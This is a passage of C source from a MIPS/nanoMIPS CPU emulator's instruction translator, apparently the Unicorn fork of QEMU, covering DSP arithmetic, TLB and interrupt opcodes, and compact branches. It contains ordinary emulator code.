check_dsp(ctx); gen_helper_maq_s_w_phr(tcg_ctx, t0, v1_t, v0_t, tcg_ctx->cpu_env); break; case NM_MAQ_S_W_PHL: check_dsp(ctx); gen_helper_maq_s_w_phl(tcg_ctx, t0, v1_t, v0_t, tcg_ctx->cpu_env); break; case NM_MAQ_SA_W_PHR: check_dsp(ctx); gen_helper_maq_sa_w_phr(tcg_ctx, t0, v1_t, v0_t, tcg_ctx->cpu_env); break; case NM_MAQ_SA_W_PHL: check_dsp(ctx); gen_helper_maq_sa_w_phl(tcg_ctx, t0, v1_t, v0_t, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free(tcg_ctx, v0_t); tcg_temp_free(tcg_ctx, v1_t); } static void gen_pool32axf_1_nanomips_insn(DisasContext *ctx, uint32_t opc, int ret, int v1, int v2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int16_t imm; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv v0_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v0_t, v1); switch (opc) { case NM_POOL32AXF_1_0: check_dsp(ctx); switch (extract32(ctx->opcode, 12, 2)) { case NM_MFHI: gen_HILO(ctx, OPC_MFHI, v2 >> 3, ret); break; case NM_MFLO: gen_HILO(ctx, OPC_MFLO, v2 >> 3, ret); break; case NM_MTHI: gen_HILO(ctx, OPC_MTHI, v2 >> 3, v1); break; case NM_MTLO: gen_HILO(ctx, OPC_MTLO, v2 >> 3, v1); break; } break; case NM_POOL32AXF_1_1: check_dsp(ctx); switch (extract32(ctx->opcode, 12, 2)) { case NM_MTHLIP: tcg_gen_movi_tl(tcg_ctx, t0, v2); gen_helper_mthlip(tcg_ctx, t0, v0_t, tcg_ctx->cpu_env); break; case NM_SHILOV: tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 3); gen_helper_shilo(tcg_ctx, t0, v0_t, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_1_3: check_dsp(ctx); imm = extract32(ctx->opcode, 14, 7); switch (extract32(ctx->opcode, 12, 2)) { case NM_RDDSP: tcg_gen_movi_tl(tcg_ctx, t0, imm); gen_helper_rddsp(tcg_ctx, t0, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_WRDSP: gen_load_gpr(tcg_ctx, t0, ret); tcg_gen_movi_tl(tcg_ctx, t1, imm); gen_helper_wrdsp(tcg_ctx, t0, t1, tcg_ctx->cpu_env); break; case NM_EXTP: tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 3); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extp(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_EXTPDP: tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 3); tcg_gen_movi_tl(tcg_ctx, t1, v1); gen_helper_extpdp(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; case NM_POOL32AXF_1_4: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 2); switch (extract32(ctx->opcode, 12, 1)) { case NM_SHLL_QB: gen_helper_shll_qb(tcg_ctx, t0, t0, 
v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_SHRL_QB: gen_helper_shrl_qb(tcg_ctx, t0, t0, v0_t); gen_store_gpr(tcg_ctx, t0, ret); break; } break; case NM_POOL32AXF_1_5: opc = extract32(ctx->opcode, 12, 2); gen_pool32axf_1_5_nanomips_insn(ctx, opc, ret, v1, v2); break; case NM_POOL32AXF_1_7: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, v2 >> 3); tcg_gen_movi_tl(tcg_ctx, t1, v1); switch (extract32(ctx->opcode, 12, 2)) { case NM_EXTR_W: gen_helper_extr_w(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_EXTR_R_W: gen_helper_extr_r_w(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_EXTR_RS_W: gen_helper_extr_rs_w(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_EXTR_S_H: gen_helper_extr_s_h(tcg_ctx, t0, t0, t1, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, v0_t); } static void gen_pool32axf_2_multiply(DisasContext *ctx, uint32_t opc, TCGv v0, TCGv v1, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, rd >> 3); switch (opc) { case NM_POOL32AXF_2_0_7: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPA_W_PH: check_dsp_r2(ctx); gen_helper_dpa_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPAQ_S_W_PH: check_dsp(ctx); gen_helper_dpaq_s_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPS_W_PH: check_dsp_r2(ctx); gen_helper_dps_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPSQ_S_W_PH: check_dsp(ctx); gen_helper_dpsq_s_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_2_8_15: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAX_W_PH: check_dsp_r2(ctx); gen_helper_dpax_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPAQ_SA_L_W: check_dsp(ctx); gen_helper_dpaq_sa_l_w(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPSX_W_PH: check_dsp_r2(ctx); gen_helper_dpsx_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPSQ_SA_L_W: check_dsp(ctx); gen_helper_dpsq_sa_l_w(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_2_16_23: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAU_H_QBL: check_dsp(ctx); gen_helper_dpau_h_qbl(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPAQX_S_W_PH: check_dsp_r2(ctx); gen_helper_dpaqx_s_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPSU_H_QBL: check_dsp(ctx); gen_helper_dpsu_h_qbl(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_DPSQX_S_W_PH: check_dsp_r2(ctx); gen_helper_dpsqx_s_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; case NM_MULSA_W_PH: check_dsp_r2(ctx); gen_helper_mulsa_w_ph(tcg_ctx, t0, v0, v1, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_2_24_31: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAU_H_QBR: check_dsp(ctx); gen_helper_dpau_h_qbr(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPAQX_SA_W_PH: check_dsp_r2(ctx); gen_helper_dpaqx_sa_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPSU_H_QBR: check_dsp(ctx); gen_helper_dpsu_h_qbr(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; case NM_DPSQX_SA_W_PH: check_dsp_r2(ctx); gen_helper_dpsqx_sa_w_ph(tcg_ctx, 
t0, v1, v0, tcg_ctx->cpu_env); break; case NM_MULSAQ_S_W_PH: check_dsp(ctx); gen_helper_mulsaq_s_w_ph(tcg_ctx, t0, v1, v0, tcg_ctx->cpu_env); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, t0); } static void gen_pool32axf_2_nanomips_insn(DisasContext *ctx, uint32_t opc, int rt, int rs, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ret = rt; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv v0_t = tcg_temp_new(tcg_ctx); TCGv v1_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v0_t, rt); gen_load_gpr(tcg_ctx, v1_t, rs); switch (opc) { case NM_POOL32AXF_2_0_7: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPA_W_PH: case NM_DPAQ_S_W_PH: case NM_DPS_W_PH: case NM_DPSQ_S_W_PH: gen_pool32axf_2_multiply(ctx, opc, v0_t, v1_t, rd); break; case NM_BALIGN: check_dsp_r2(ctx); if (rt != 0) { gen_load_gpr(tcg_ctx, t0, rs); rd &= 3; if (rd != 0 && rd != 2) { tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], 8 * rd); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (4 - rd)); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret], t0); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[ret], tcg_ctx->cpu_gpr[ret]); } break; case NM_MADD: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case NM_MULT: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case NM_EXTRV_W: check_dsp(ctx); gen_load_gpr(tcg_ctx, v1_t, rs); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extr_w(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; case NM_POOL32AXF_2_8_15: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAX_W_PH: case NM_DPAQ_SA_L_W: case NM_DPSX_W_PH: case NM_DPSQ_SA_L_W: gen_pool32axf_2_multiply(ctx, opc, v0_t, v1_t, rd); break; case NM_MADDU: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); 
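                /*
                 * Added commentary, not in the original source: the MADDU
                 * case above zero-extends both 32-bit GPR operands, forms
                 * the 64-bit product, and adds it into the HI:LO accumulator
                 * pair selected by 'acc'. A minimal sketch of the same
                 * arithmetic in plain C, with hypothetical hi/lo/rs_val/
                 * rt_val names:
                 */
#if 0 /* illustrative only */
                uint64_t acc64 = ((uint64_t)hi << 32) | lo;   /* concat HI:LO */
                acc64 += (uint64_t)rs_val * (uint64_t)rt_val; /* widening MADDU */
                lo = (uint32_t)acc64;                         /* new LO */
                hi = (uint32_t)(acc64 >> 32);                 /* new HI */
#endif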
tcg_temp_free_i64(tcg_ctx, t2); } break; case NM_MULTU: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case NM_EXTRV_R_W: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extr_r_w(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_2_16_23: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAU_H_QBL: case NM_DPAQX_S_W_PH: case NM_DPSU_H_QBL: case NM_DPSQX_S_W_PH: case NM_MULSA_W_PH: gen_pool32axf_2_multiply(ctx, opc, v0_t, v1_t, rd); break; case NM_EXTPV: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extp(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_MSUB: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case NM_EXTRV_RS_W: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extr_rs_w(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; case NM_POOL32AXF_2_24_31: switch (extract32(ctx->opcode, 9, 3)) { case NM_DPAU_H_QBR: case NM_DPAQX_SA_W_PH: case NM_DPSU_H_QBR: case NM_DPSQX_SA_W_PH: case NM_MULSAQ_S_W_PH: gen_pool32axf_2_multiply(ctx, opc, v0_t, v1_t, rd); break; case NM_EXTPDPV: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extpdp(tcg_ctx, t0, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; case NM_MSUBU: check_dsp(ctx); { int acc = extract32(ctx->opcode, 14, 2); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case NM_EXTRV_S_H: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 3); gen_helper_extr_s_h(tcg_ctx, t0, t0, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, ret); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, v0_t); tcg_temp_free(tcg_ctx, v1_t); } static void gen_pool32axf_4_nanomips_insn(DisasContext *ctx, uint32_t opc, int 
rt, int rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ret = rt; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv v0_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v0_t, rs); switch (opc) { case NM_ABSQ_S_QB: check_dsp_r2(ctx); gen_helper_absq_s_qb(tcg_ctx, v0_t, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_ABSQ_S_PH: check_dsp(ctx); gen_helper_absq_s_ph(tcg_ctx, v0_t, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_ABSQ_S_W: check_dsp(ctx); gen_helper_absq_s_w(tcg_ctx, v0_t, v0_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQ_W_PHL: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, v0_t, v0_t, 0xFFFF0000); tcg_gen_ext32s_tl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQ_W_PHR: check_dsp(ctx); tcg_gen_andi_tl(tcg_ctx, v0_t, v0_t, 0x0000FFFF); tcg_gen_shli_tl(tcg_ctx, v0_t, v0_t, 16); tcg_gen_ext32s_tl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQU_PH_QBL: check_dsp(ctx); gen_helper_precequ_ph_qbl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQU_PH_QBR: check_dsp(ctx); gen_helper_precequ_ph_qbr(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQU_PH_QBLA: check_dsp(ctx); gen_helper_precequ_ph_qbla(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEQU_PH_QBRA: check_dsp(ctx); gen_helper_precequ_ph_qbra(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEU_PH_QBL: check_dsp(ctx); gen_helper_preceu_ph_qbl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEU_PH_QBR: check_dsp(ctx); gen_helper_preceu_ph_qbr(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEU_PH_QBLA: check_dsp(ctx); gen_helper_preceu_ph_qbla(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_PRECEU_PH_QBRA: check_dsp(ctx); gen_helper_preceu_ph_qbra(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_REPLV_PH: check_dsp(ctx); tcg_gen_ext16u_tl(tcg_ctx, v0_t, v0_t); tcg_gen_shli_tl(tcg_ctx, t0, v0_t, 16); tcg_gen_or_tl(tcg_ctx, v0_t, v0_t, t0); tcg_gen_ext32s_tl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_REPLV_QB: check_dsp(ctx); tcg_gen_ext8u_tl(tcg_ctx, v0_t, v0_t); tcg_gen_shli_tl(tcg_ctx, t0, v0_t, 8); tcg_gen_or_tl(tcg_ctx, v0_t, v0_t, t0); tcg_gen_shli_tl(tcg_ctx, t0, v0_t, 16); tcg_gen_or_tl(tcg_ctx, v0_t, v0_t, t0); tcg_gen_ext32s_tl(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_BITREV: check_dsp(ctx); gen_helper_bitrev(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_INSV: check_dsp(ctx); { TCGv tv0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, tv0, rt); gen_helper_insv(tcg_ctx, v0_t, tcg_ctx->cpu_env, v0_t, tv0); gen_store_gpr(tcg_ctx, v0_t, ret); tcg_temp_free(tcg_ctx, tv0); } break; case NM_RADDU_W_QB: check_dsp(ctx); gen_helper_raddu_w_qb(tcg_ctx, v0_t, v0_t); gen_store_gpr(tcg_ctx, v0_t, ret); break; case NM_BITSWAP: gen_bitswap(ctx, OPC_BITSWAP, ret, rs); break; case NM_CLO: check_nms(ctx); gen_cl(ctx, OPC_CLO, ret, rs); break; case NM_CLZ: check_nms(ctx); gen_cl(ctx, OPC_CLZ, ret, rs); break; case NM_WSBH: gen_bshfl(ctx, OPC_WSBH, ret, rs); break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, v0_t); tcg_temp_free(tcg_ctx, t0); } static void gen_pool32axf_7_nanomips_insn(DisasContext *ctx, uint32_t opc, int rt, int rs, int rd) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv 
t0 = tcg_temp_new(tcg_ctx); TCGv rs_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, rs_t, rs); switch (opc) { case NM_SHRA_R_QB: check_dsp_r2(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 2); switch (extract32(ctx->opcode, 12, 1)) { case 0: /* NM_SHRA_QB */ gen_helper_shra_qb(tcg_ctx, t0, t0, rs_t); gen_store_gpr(tcg_ctx, t0, rt); break; case 1: /* NM_SHRA_R_QB */ gen_helper_shra_r_qb(tcg_ctx, t0, t0, rs_t); gen_store_gpr(tcg_ctx, t0, rt); break; } break; case NM_SHRL_PH: check_dsp_r2(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 1); gen_helper_shrl_ph(tcg_ctx, t0, t0, rs_t); gen_store_gpr(tcg_ctx, t0, rt); break; case NM_REPL_QB: check_dsp(ctx); { int16_t imm; target_long result; imm = extract32(ctx->opcode, 13, 8); result = (uint32_t)imm << 24 | (uint32_t)imm << 16 | (uint32_t)imm << 8 | (uint32_t)imm; result = (int32_t)result; tcg_gen_movi_tl(tcg_ctx, t0, result); gen_store_gpr(tcg_ctx, t0, rt); } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, rs_t); } static void gen_pool32axf_nanomips_insn(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rt = extract32(ctx->opcode, 21, 5); int rs = extract32(ctx->opcode, 16, 5); int rd = extract32(ctx->opcode, 11, 5); switch (extract32(ctx->opcode, 6, 3)) { case NM_POOL32AXF_1: { int32_t op1 = extract32(ctx->opcode, 9, 3); gen_pool32axf_1_nanomips_insn(ctx, op1, rt, rs, rd); } break; case NM_POOL32AXF_2: { int32_t op1 = extract32(ctx->opcode, 12, 2); gen_pool32axf_2_nanomips_insn(ctx, op1, rt, rs, rd); } break; case NM_POOL32AXF_4: { int32_t op1 = extract32(ctx->opcode, 9, 7); gen_pool32axf_4_nanomips_insn(ctx, op1, rt, rs); } break; case NM_POOL32AXF_5: switch (extract32(ctx->opcode, 9, 7)) { case NM_TLBP: gen_cp0(env, ctx, OPC_TLBP, 0, 0); break; case NM_TLBR: gen_cp0(env, ctx, OPC_TLBR, 0, 0); break; case NM_TLBWI: gen_cp0(env, ctx, OPC_TLBWI, 0, 0); break; case NM_TLBWR: gen_cp0(env, ctx, OPC_TLBWR, 0, 0); break; case NM_TLBINV: gen_cp0(env, ctx, OPC_TLBINV, 0, 0); break; case NM_TLBINVF: gen_cp0(env, ctx, OPC_TLBINVF, 0, 0); break; case NM_DI: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); save_cpu_state(ctx, 1); gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; tcg_temp_free(tcg_ctx, t0); } break; case NM_EI: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); save_cpu_state(ctx, 1); gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; tcg_temp_free(tcg_ctx, t0); } break; case NM_RDPGPR: gen_load_srsgpr(tcg_ctx, rs, rt); break; case NM_WRPGPR: gen_store_srsgpr(tcg_ctx, rs, rt); break; case NM_WAIT: gen_cp0(env, ctx, OPC_WAIT, 0, 0); break; case NM_DERET: gen_cp0(env, ctx, OPC_DERET, 0, 0); break; case NM_ERETX: gen_cp0(env, ctx, OPC_ERET, 0, 0); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32AXF_7: { int32_t op1 = extract32(ctx->opcode, 9, 3); gen_pool32axf_7_nanomips_insn(ctx, op1, rt, rs, rd); } break; default: generate_exception_end(ctx, EXCP_RI); break; } } /* Immediate Value Compact Branches */ static void gen_compute_imm_branch(DisasContext *ctx, uint32_t opc, int rt, int32_t imm, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGCond cond; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); 
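    /*
     * Added commentary, not in the original source: this helper first
     * classifies the opcode (setting 'cond' and 'bcond_compute'), then
     * either emits an unconditional goto_tb or a conditional branch. The
     * conditional path branches on the *inverted* condition to a
     * fall-through label, so the taken case can be emitted straight-line.
     * The pattern, as hedged pseudo-C with hypothetical names:
     */
#if 0 /* illustrative only */
    if (!cond_holds)            /* tcg_gen_brcond(invert(cond), ...) */
        goto not_taken;
    goto_tb(1, btarget);        /* branch taken */
not_taken:
    goto_tb(0, pc_next + 4);    /* fall through */
#endif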
    gen_load_gpr(tcg_ctx, t0, rt);
    tcg_gen_movi_tl(tcg_ctx, t1, imm);
    ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset);

    /* Load needed operands and calculate btarget */
    switch (opc) {
    case NM_BEQIC:
        if (rt == 0 && imm == 0) {
            /* Unconditional branch */
        } else if (rt == 0 && imm != 0) {
            /* Treat as NOP */
            goto out;
        } else {
            bcond_compute = 1;
            cond = TCG_COND_EQ;
        }
        break;
    case NM_BBEQZC:
    case NM_BBNEZC:
        check_nms(ctx);
        if (imm >= 32 && !(ctx->hflags & MIPS_HFLAG_64)) {
            generate_exception_end(ctx, EXCP_RI);
            goto out;
        } else if (rt == 0 && opc == NM_BBEQZC) {
            /* Unconditional branch */
        } else if (rt == 0 && opc == NM_BBNEZC) {
            /* Treat as NOP */
            goto out;
        } else {
            tcg_gen_shri_tl(tcg_ctx, t0, t0, imm);
            tcg_gen_andi_tl(tcg_ctx, t0, t0, 1);
            tcg_gen_movi_tl(tcg_ctx, t1, 0);
            bcond_compute = 1;
            if (opc == NM_BBEQZC) {
